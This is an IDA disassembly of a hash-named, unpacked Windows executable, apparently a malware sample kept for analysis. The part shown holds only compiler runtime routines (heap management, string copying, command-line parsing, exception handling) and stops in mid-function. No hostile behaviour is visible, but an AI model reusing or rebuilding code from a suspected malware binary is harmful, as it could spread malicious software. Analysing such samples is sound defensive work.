;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : C2CE5F8AD0DD533A8C015EA68B60DA01
; File Name : u:\work\c2ce5f8ad0dd533a8c015ea68b60da01_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00003200 ( 12800.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; [00000006 BYTES: COLLAPSED FUNCTION GetProcessHeap. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapAlloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION HeapReAlloc. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapFree. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION FreeLibrary. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LocalAlloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION TlsGetValue. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION TlsSetValue. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_401058: ; DATA XREF: sub_40158C�o
jmp ds:RaiseException
; ---------------------------------------------------------------------------
align 10h
loc_401060: ; DATA XREF: sub_40158C+A�o
jmp ds:RtlUnwind
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CharNextA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetCurrentThreadId. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_401080 proc near ; CODE XREF: sub_4010D0+4�p
; sub_401100+3F�p
; DATA XREF: ...
push eax ; dwBytes
mov eax, ds:dwFlags
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapAlloc
retn
sub_401080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401094 proc near ; CODE XREF: sub_4010E8+4�p
; sub_401100+26�p
; DATA XREF: ...
push ebx
mov ebx, eax
push ebx ; lpMem
mov eax, ds:dwFlags
and eax, 1
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapFree
cmp eax, 1
sbb eax, eax
neg eax
and eax, 7Fh
pop ebx
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010B8 proc near ; CODE XREF: sub_401100+D�p
; DATA XREF: DATA:off_405034�o
push edx ; dwBytes
push eax ; lpMem
mov eax, ds:dwFlags
and eax, 0
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapReAlloc
retn
sub_4010B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4010D0 proc near ; CODE XREF: sub_401778+C�p
test eax, eax
jz short locret_4010DE
call ds:off_40502C
or eax, eax
jz short loc_4010DF
locret_4010DE: ; CODE XREF: sub_4010D0+2�j
retn
; ---------------------------------------------------------------------------
loc_4010DF: ; CODE XREF: sub_4010D0+C�j
mov al, 1
jmp loc_4011A8
sub_4010D0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4010E8 proc near ; CODE XREF: sub_4016E0+1B�p
; sub_401704+20�p ...
test eax, eax
jz short locret_4010F6
call ds:off_405030
or eax, eax
jnz short loc_4010F7
locret_4010F6: ; CODE XREF: sub_4010E8+2�j
retn
; ---------------------------------------------------------------------------
loc_4010F7: ; CODE XREF: sub_4010E8+C�j
mov al, 2
jmp loc_4011A8
sub_4010E8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401100 proc near ; CODE XREF: sub_401A20+22�p
; FUNCTION CHUNK AT 004011A8 SIZE 0000000B BYTES
mov ecx, [eax]
test ecx, ecx
jz short loc_401138
test edx, edx
jz short loc_401122
push eax
mov eax, ecx
call ds:off_405034
pop ecx
or eax, eax
jz short loc_401131
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_40111B: ; CODE XREF: sub_401100+2E�j
mov al, 2
jmp loc_4011A8
; ---------------------------------------------------------------------------
loc_401122: ; CODE XREF: sub_401100+8�j
mov [eax], edx
mov eax, ecx
call ds:off_405030
or eax, eax
jnz short loc_40111B
retn
; ---------------------------------------------------------------------------
loc_401131: ; CODE XREF: sub_401100+16�j
; sub_401100+48�j
mov al, 1
jmp loc_4011A8
; ---------------------------------------------------------------------------
loc_401138: ; CODE XREF: sub_401100+4�j
test edx, edx
jz short locret_40114C
push eax
mov eax, edx
call ds:off_40502C
pop ecx
or eax, eax
jz short loc_401131
mov [ecx], eax
locret_40114C: ; CODE XREF: sub_401100+3A�j
retn
sub_401100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401150 proc near ; CODE XREF: sub_40115C+42�p
mov ds:dword_405004, edx
call sub_4016C8
sub_401150 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40115C proc near ; CODE XREF: sub_401100+AE�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_406004, 0
jz short loc_401178
mov edx, esi
mov eax, ebx
call ds:dword_406004
loc_401178: ; CODE XREF: sub_40115C+10�j
test bl, bl
jnz short loc_401189
call sub_401BD0
mov ebx, [eax+0]
jmp short loc_401198
; ---------------------------------------------------------------------------
loc_401189: ; CODE XREF: sub_40115C+1E�j
cmp bl, 18h
ja short loc_401198
xor eax, eax
mov al, bl
mov bl, ds:byte_405038[eax]
loc_401198: ; CODE XREF: sub_40115C+2B�j
; sub_40115C+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_401150
sub_40115C endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_401100
loc_4011A8: ; CODE XREF: sub_4010D0+11�j
; sub_4010E8+11�j ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_40115C
; END OF FUNCTION CHUNK FOR sub_401100
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4011B4 proc near ; CODE XREF: sub_4013C0+14�p
; sub_401734+1B�p ...
cmp ecx, 4
jge short loc_4011D5
jcxz locret_401213
cmp eax, edx
jz short locret_401213
push esi
push edi
mov esi, eax
mov edi, edx
ja short loc_4011D1
lea esi, [ecx+esi-1]
lea edi, [ecx+edi-1]
std
loc_4011D1: ; CODE XREF: sub_4011B4+12�j
rep movsb
jmp short loc_401201
; ---------------------------------------------------------------------------
loc_4011D5: ; CODE XREF: sub_4011B4+3�j
cmp eax, edx
jz short locret_401213
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
ja short loc_401203
and ecx, 3
lea esi, [eax+esi-1]
lea edi, [eax+edi-1]
std
rep movsb
sar eax, 2
mov ecx, eax
mov eax, 3
sub esi, eax
sub edi, eax
rep movsd
loc_401201: ; CODE XREF: sub_4011B4+1F�j
cld
dec ecx
loc_401203: ; CODE XREF: sub_4011B4+2D�j
sar ecx, 2
js short loc_401211
rep movsd
and eax, 3
mov ecx, eax
rep movsb
loc_401211: ; CODE XREF: sub_4011B4+52�j
pop edi
pop esi
locret_401213: ; CODE XREF: sub_4011B4+5�j
; sub_4011B4+A�j ...
retn
sub_4011B4 endp
; =============== S U B R O U T I N E =======================================
sub_401214 proc near ; CODE XREF: sub_401300+1F�p
; sub_401300+2B�p ...
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_401226
; ---------------------------------------------------------------------------
loc_40121E: ; CODE XREF: sub_401214+1A�j
push ebx ; lpsz
call CharNextA
mov ebx, eax
loc_401226: ; CODE XREF: sub_401214+8�j
; sub_401214+2A�j
mov al, [ebx]
test al, al
jz short loc_401230
cmp al, 20h
jbe short loc_40121E
loc_401230: ; CODE XREF: sub_401214+16�j
cmp byte ptr [ebx], 22h
jnz short loc_401240
cmp byte ptr [ebx+1], 22h
jnz short loc_401240
add ebx, 2
jmp short loc_401226
; ---------------------------------------------------------------------------
loc_401240: ; CODE XREF: sub_401214+1F�j
; sub_401214+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_401289
; ---------------------------------------------------------------------------
loc_401246: ; CODE XREF: sub_401214+79�j
cmp al, 22h
jnz short loc_40127B
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_401262
; ---------------------------------------------------------------------------
loc_401254: ; CODE XREF: sub_401214+56�j
push ebx ; lpsz
call CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_401262: ; CODE XREF: sub_401214+3E�j
mov al, [ebx]
test al, al
jz short loc_40126C
cmp al, 22h
jnz short loc_401254
loc_40126C: ; CODE XREF: sub_401214+52�j
cmp byte ptr [ebx], 0
jz short loc_401289
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_401289
; ---------------------------------------------------------------------------
loc_40127B: ; CODE XREF: sub_401214+34�j
push ebx ; lpsz
call CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_401289: ; CODE XREF: sub_401214+30�j
; sub_401214+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_401246
mov eax, esi
mov edx, ebp
call sub_401A20
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_4012F1
; ---------------------------------------------------------------------------
loc_4012A0: ; CODE XREF: sub_401214+E1�j
cmp al, 22h
jnz short loc_4012DC
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_4012C3
; ---------------------------------------------------------------------------
loc_4012AE: ; CODE XREF: sub_401214+B7�j
push ebx ; lpsz
call CharNextA
cmp eax, ebx
jbe short loc_4012C3
loc_4012B8: ; CODE XREF: sub_401214+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_4012B8
loc_4012C3: ; CODE XREF: sub_401214+98�j
; sub_401214+A2�j
mov al, [ebx]
test al, al
jz short loc_4012CD
cmp al, 22h
jnz short loc_4012AE
loc_4012CD: ; CODE XREF: sub_401214+B3�j
cmp byte ptr [ebx], 0
jz short loc_4012F1
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_4012F1
; ---------------------------------------------------------------------------
loc_4012DC: ; CODE XREF: sub_401214+8E�j
push ebx ; lpsz
call CharNextA
cmp eax, ebx
jbe short loc_4012F1
loc_4012E6: ; CODE XREF: sub_401214+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_4012E6
loc_4012F1: ; CODE XREF: sub_401214+8A�j
; sub_401214+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_4012A0
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401214 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401300 proc near ; CODE XREF: sub_403EB5+A5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004014B0 SIZE 00000036 BYTES
push ebp
mov ebp, esp
push 0
push ebx
push esi
xor eax, eax
push ebp
push offset loc_401351
push dword ptr fs:[eax]
mov fs:[eax], esp
xor esi, esi
call GetCommandLineA
lea edx, [ebp+var_4]
call sub_401214
mov ebx, eax
loc_401326: ; CODE XREF: sub_401300+39�j
lea edx, [ebp+var_4]
mov eax, ebx
call sub_401214
mov ebx, eax
cmp [ebp+var_4], 0
jz short loc_40133B
inc esi
jmp short loc_401326
; ---------------------------------------------------------------------------
loc_40133B: ; CODE XREF: sub_401300+36�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401358
loc_401348: ; CODE XREF: sub_401300+56�j
lea eax, [ebp+var_4]
call sub_4016E0
retn
; ---------------------------------------------------------------------------
loc_401351: ; DATA XREF: sub_401300+A�o
jmp loc_4014B0
; ---------------------------------------------------------------------------
jmp short loc_401348
; ---------------------------------------------------------------------------
loc_401358: ; CODE XREF: sub_401300+50�j
; DATA XREF: sub_401300+43�o
mov eax, esi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_401300 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401360 proc near ; CODE XREF: sub_403990+A5�p
; sub_403EB5+CE�p ...
Filename = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_4016E0
test esi, esi
jnz short loc_401396
push 105h ; nSize
lea eax, [esp+118h+Filename]
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_4017A4
jmp short loc_4013B4
; ---------------------------------------------------------------------------
loc_401396: ; CODE XREF: sub_401360+16�j
call GetCommandLineA
mov edi, eax
loc_40139D: ; CODE XREF: sub_401360+52�j
mov edx, ebx
mov eax, edi
call sub_401214
mov edi, eax
test esi, esi
jz short loc_4013B4
cmp dword ptr [ebx], 0
jz short loc_4013B4
dec esi
jmp short loc_40139D
; ---------------------------------------------------------------------------
loc_4013B4: ; CODE XREF: sub_401360+34�j
; sub_401360+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_401360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4013C0 proc near ; CODE XREF: sub_403650+28�p
push ebx
mov bl, [edx]
cmp cl, bl
jbe short loc_4013C9
mov ecx, ebx
loc_4013C9: ; CODE XREF: sub_4013C0+5�j
mov [eax], cl
inc edx
inc eax
and ecx, 0FFh
xchg eax, edx
call sub_4011B4
pop ebx
retn
sub_4013C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4013DC proc near ; CODE XREF: sub_401E0C+7E�p
; sub_401FF4+235�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_4013F9
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_4013F9: ; CODE XREF: sub_4013DC+12�j
pop edi
retn
sub_4013DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4013FC proc near ; CODE XREF: sub_40145C+4�p
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
push ebx
push esi
push edi
push edx
sub esp, 14h
mov edi, ecx
mov esi, eax
cdq
xor eax, edx
sub eax, edx
mov ecx, 0Ah
xor ebx, ebx
loc_401413: ; CODE XREF: sub_4013FC+24�j
xor edx, edx
div ecx
add edx, 30h
mov [esp+ebx+24h+var_24], dl
inc ebx
test eax, eax
jnz short loc_401413
test esi, esi
jge short loc_40142B
mov [esp+ebx+24h+var_24], 2Dh
inc ebx
loc_40142B: ; CODE XREF: sub_4013FC+28�j
mov [edi], bl
inc edi
mov ecx, [esp+24h+var_10]
cmp ecx, 0FFh
jle short loc_40143F
mov ecx, 0FFh
loc_40143F: ; CODE XREF: sub_4013FC+3C�j
sub ecx, ebx
jle short loc_40144A
add [edi-1], cl
mov al, 20h
rep stosb
loc_40144A: ; CODE XREF: sub_4013FC+45�j
; sub_4013FC+56�j
mov al, [esp+ebx-1]
mov [edi], al
inc edi
dec ebx
jnz short loc_40144A
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_4013FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40145C proc near ; CODE XREF: sub_403650+18�p
mov ecx, edx
xor edx, edx
call sub_4013FC
retn
sub_40145C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401468 proc near ; CODE XREF: sub_401488+C�p
test ecx, ecx
jz short locret_401485
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_401480
cmp byte ptr [ecx], 0EBh
jnz short locret_401485
movsx eax, al
inc ecx
inc ecx
jmp short loc_401483
; ---------------------------------------------------------------------------
loc_401480: ; CODE XREF: sub_401468+A�j
add ecx, 5
loc_401483: ; CODE XREF: sub_401468+16�j
add ecx, eax
locret_401485: ; CODE XREF: sub_401468+2�j
; sub_401468+F�j
retn
sub_401468 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401488 proc near ; CODE XREF: sub_401300+1D5�p
cmp ds:byte_405008, 1
jbe short locret_4014AE
push eax
push edx
push ecx
call sub_401468
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:dword_406008
pop ecx
pop ecx
pop edx
pop eax
locret_4014AE: ; CODE XREF: sub_401488+7�j
retn
sub_401488 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_401300
loc_4014B0: ; CODE XREF: sub_401300:loc_401351�j
; CODE:loc_401B3C�j ...
mov eax, [esp+0Ch+var_8]
mov edx, [esp+0Ch+var_4]
test dword ptr [eax+4], 6
jz short loc_4014E0
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_4014E0
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_401488
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_4014E0: ; CODE XREF: sub_401300+1BF�j
; DATA XREF: sub_401300+1C4�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_401300
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014E8 proc near ; CODE XREF: sub_4015F8:loc_401646�p
; DATA XREF: DATA:off_40501C�o
push ebx
push esi
push edi
push ebp
mov edi, offset dword_40602C
mov eax, [edi+8]
test eax, eax
jz short loc_401516
mov ebx, [edi+0Ch]
mov esi, [eax+4]
test ebx, ebx
jle short loc_401516
loc_401502: ; CODE XREF: sub_4014E8+2C�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_401512
mov ebp, eax
call ebp
loc_401512: ; CODE XREF: sub_4014E8+24�j
test ebx, ebx
jg short loc_401502
loc_401516: ; CODE XREF: sub_4014E8+E�j
; sub_4014E8+18�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4014E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40151C proc near ; CODE XREF: sub_40151C+43�p
; sub_401570+12�p
; DATA XREF: ...
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov ebp, edx
mov esi, eax
mov eax, offset sub_40151C
cmp eax, ds:off_405018
setz bl
cmp edi, ebp
jle short loc_40156B
loc_401538: ; CODE XREF: sub_40151C+4D�j
mov eax, [esi+ebp*8]
inc ebp
mov ds:dword_406038, ebp
test eax, eax
jz short loc_401548
call eax
loc_401548: ; CODE XREF: sub_40151C+28�j
test bl, bl
jz short loc_401567
mov eax, offset sub_40151C
cmp eax, ds:off_405018
jz short loc_401567
mov ecx, edi
mov edx, ebp
mov eax, esi
call ds:off_405018
jmp short loc_40156B
; ---------------------------------------------------------------------------
loc_401567: ; CODE XREF: sub_40151C+2E�j
; sub_40151C+3B�j
cmp edi, ebp
jg short loc_401538
loc_40156B: ; CODE XREF: sub_40151C+1A�j
; sub_40151C+49�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40151C endp
; =============== S U B R O U T I N E =======================================
sub_401570 proc near ; CODE XREF: sub_40158C+35�p
mov eax, ds:dword_406034
test eax, eax
jz short locret_401588
mov edx, [eax]
xor ecx, ecx
mov eax, [eax+4]
xchg ecx, edx
call ds:off_405018
locret_401588: ; CODE XREF: sub_401570+7�j
retn
sub_401570 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40158C proc near ; CODE XREF: sub_401C1C+3A�p
mov ds:dword_406008, offset loc_401058
mov ds:dword_40600C, offset loc_401060
mov ds:dword_406034, eax
xor eax, eax
mov ds:dword_406038, eax
mov ds:dword_40603C, edx
mov eax, [edx+4]
mov ds:dword_406014, eax
mov ds:byte_40601C, 0
call sub_401570
retn
sub_40158C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4015C8 proc near ; CODE XREF: sub_4015F8+96�p
xor eax, eax
xchg eax, ds:dword_405000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_40602C
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_4015C8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4015F8 proc near ; CODE XREF: sub_4016C8+5�p
; sub_403EB5:loc_404096�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_40602C
mov esi, offset dword_405000
mov edi, offset dword_406020
cmp byte ptr [ebx+28h], 0
jnz short loc_401627
cmp dword ptr [edi], 0
jz short loc_401627
loc_401616: ; CODE XREF: sub_4015F8+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_401616
loc_401627: ; CODE XREF: sub_4015F8+17�j
; sub_4015F8+1C�j
cmp ds:dword_405004, 0
jz short loc_401636
call ds:off_405054
loc_401636: ; CODE XREF: sub_4015F8+36�j
; sub_4015F8+C6�j
cmp byte ptr [ebx+28h], 2
jnz short loc_401646
cmp dword ptr [esi], 0
jnz short loc_401646
xor eax, eax
mov [ebx+0Ch], eax
loc_401646: ; CODE XREF: sub_4015F8+42�j
; sub_4015F8+47�j
call ds:off_40501C
cmp byte ptr [ebx+28h], 1
jbe short loc_401657
cmp dword ptr [esi], 0
jz short loc_401679
loc_401657: ; CODE XREF: sub_4015F8+58�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_401679
call ds:off_405014
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_401679
test eax, eax
jz short loc_401679
push eax ; hLibModule
call FreeLibrary
loc_401679: ; CODE XREF: sub_4015F8+5D�j
; sub_4015F8+64�j ...
call ds:off_405020
cmp byte ptr [ebx+28h], 1
jnz short loc_401688
call dword ptr [ebx+24h]
loc_401688: ; CODE XREF: sub_4015F8+8B�j
cmp byte ptr [ebx+28h], 0
jz short loc_401693
call sub_4015C8
loc_401693: ; CODE XREF: sub_4015F8+94�j
cmp dword ptr [ebx], 0
jnz short loc_4016AF
cmp ds:dword_406010, 0
jz short loc_4016A7
call ds:dword_406010
loc_4016A7: ; CODE XREF: sub_4015F8+A7�j
mov eax, [esi]
push eax ; uExitCode
call ExitProcess
; ---------------------------------------------------------------------------
loc_4016AF: ; CODE XREF: sub_4015F8+9E�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_401636
sub_4015F8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4016C8 proc near ; CODE XREF: sub_401150+6�p
; sub_4016D4+6�j
mov ds:dword_405000, eax
call sub_4015F8
sub_4016C8 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4016D4 proc near ; CODE XREF: sub_401B8C+1A�p
; sub_401B8C+2F�p
pop ds:dword_405004
jmp sub_4016C8
sub_4016D4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4016E0 proc near ; CODE XREF: sub_401300+4B�p
; sub_401360+F�p ...
mov edx, [eax]
test edx, edx
jz short locret_401701
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_401701
dec dword ptr [edx-8]
jnz short locret_401701
push eax
lea eax, [edx-8]
call sub_4010E8
pop eax
locret_401701: ; CODE XREF: sub_4016E0+4�j
; sub_4016E0+10�j ...
retn
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401704 proc near ; CODE XREF: sub_401FF4+49D�p
; sub_401FF4+4AA�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_40170A: ; CODE XREF: sub_401704+29�j
mov edx, [ebx]
test edx, edx
jz short loc_401729
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_401729
dec dword ptr [edx-8]
jnz short loc_401729
lea eax, [edx-8]
call sub_4010E8
loc_401729: ; CODE XREF: sub_401704+A�j
; sub_401704+16�j ...
add ebx, 4
dec esi
jnz short loc_40170A
pop esi
pop ebx
retn
sub_401704 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401734 proc near ; CODE XREF: sub_401810+8�j
; sub_401854:loc_4018C5�p ...
test edx, edx
jz short loc_40175B
mov ecx, [edx-8]
inc ecx
jg short loc_401758
push eax
push edx
mov eax, [edx-4]
call sub_401778
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_4011B4
pop edx
pop eax
jmp short loc_40175B
; ---------------------------------------------------------------------------
loc_401758: ; CODE XREF: sub_401734+8�j
inc dword ptr [edx-8]
loc_40175B: ; CODE XREF: sub_401734+2�j
; sub_401734+22�j
xchg edx, [eax]
test edx, edx
jz short locret_401774
mov ecx, [edx-8]
dec ecx
jl short locret_401774
dec dword ptr [edx-8]
jnz short locret_401774
lea eax, [edx-8]
call sub_4010E8
locret_401774: ; CODE XREF: sub_401734+2B�j
; sub_401734+31�j ...
retn
sub_401734 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401778 proc near ; CODE XREF: sub_401734+F�p
; sub_4017A4+B�p ...
test eax, eax
jle short loc_4017A0
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_4010D0
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_4017A0: ; CODE XREF: sub_401778+2�j
xor eax, eax
retn
sub_401778 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4017A4 proc near ; CODE XREF: sub_401360+2F�p
; sub_4017D4+8�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_401778
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_4017C5
mov edx, eax
mov eax, esi
call sub_4011B4
loc_4017C5: ; CODE XREF: sub_4017A4+16�j
mov eax, ebx
call sub_4016E0
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_4017A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4017D4 proc near ; CODE XREF: sub_401E0C+90�p
; sub_401F5C+53�p ...
push edx
mov edx, esp
mov ecx, 1
call sub_4017A4
pop edx
retn
sub_4017D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4017E4 proc near ; CODE XREF: sub_403650+33�p
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_4017A4
sub_4017E4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4017F0 proc near ; CODE XREF: sub_403990+66�p
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_4017FD
not ecx
loc_4017FD: ; CODE XREF: sub_4017F0+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_4017A4
sub_4017F0 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401808 proc near ; CODE XREF: sub_401F5C+2A�p
; sub_4036BC+12�p ...
test eax, eax
jz short locret_40180F
mov eax, [eax-4]
locret_40180F: ; CODE XREF: sub_401808+2�j
retn
sub_401808 endp
; =============== S U B R O U T I N E =======================================
sub_401810 proc near ; CODE XREF: sub_401E0C+9A�p
; sub_401F5C+5E�p ...
test edx, edx
